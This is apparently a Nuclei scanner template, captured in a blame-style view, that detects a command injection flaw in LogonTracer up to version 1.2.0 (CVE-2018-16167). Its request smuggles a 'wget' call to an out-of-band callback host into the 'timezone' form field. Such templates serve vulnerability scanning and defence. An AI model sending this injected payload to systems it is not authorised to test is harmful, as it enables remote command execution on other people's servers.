2021-08-10 05:24:54 +00:00
|
|
|
id: CVE-2018-16167
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: LogonTracer <=1.2.0 - Remote Command Injection
|
2021-08-10 05:24:54 +00:00
|
|
|
author: gy741
|
|
|
|
severity: critical
|
|
|
|
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-08-10 05:24:54 +00:00
|
|
|
- https://www.exploit-db.com/exploits/49918
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://jvn.jp/en/vu/JVNVU98026636/index.html
|
|
|
|
- https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-16167
|
|
|
|
cwe-id: CWE-78
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2018,logontracer,rce,oast
|
2021-08-10 05:24:54 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /upload HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
|
|
words:
|
|
|
|
- "http"
|
2022-05-13 20:26:43 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/12
|